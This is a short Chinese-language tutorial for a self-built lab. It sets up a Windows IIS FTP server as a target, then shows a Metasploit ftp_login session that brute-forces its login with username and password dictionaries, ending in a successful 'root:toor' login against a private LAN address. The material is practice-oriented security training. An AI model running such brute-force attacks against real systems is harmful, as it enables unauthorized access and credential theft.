靶机环境搭建:
1.创建一个用户(用于爆破):配置 -> 本地用户和组 -> 用户 -> 右键新用户
2.服务管理器 -> 角色 -> web服务器(iis) -> internet 信息服务(iis)管理器 -> 网站 -> 添加ftp站点
3.站点名字随意 -> 选择一份源码 -> 下一步
4.绑定IP -> ssl无 -> 下一步
5. 勾选匿名 -> 指定用户-> 指定你所创建的用户 -> 勾选读写/写入 -> 完成
6.打开cmd 输入ipconfig -> 复制IP
7.本机访问你所复制的IP到浏览器 -> 访问ftp:// IP 输入你所创建的用户看看是否搭建成功
实操部分:
设置用户字典-> 设置密码字典-> 设置IP
msf5 > use auxiliary/scanner/ftp/ftp_login
msf5 auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /home/jingxie/PASS.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS 192.168.44.132 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/jingxie/USER.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/ftp/ftp_login) > run
[+] 192.168.44.132:21 - 192.168.44.132:21 - Login Successful: root:toor
ps:如果你还不会设置请看这一篇学习设置往后的文章里不在追叙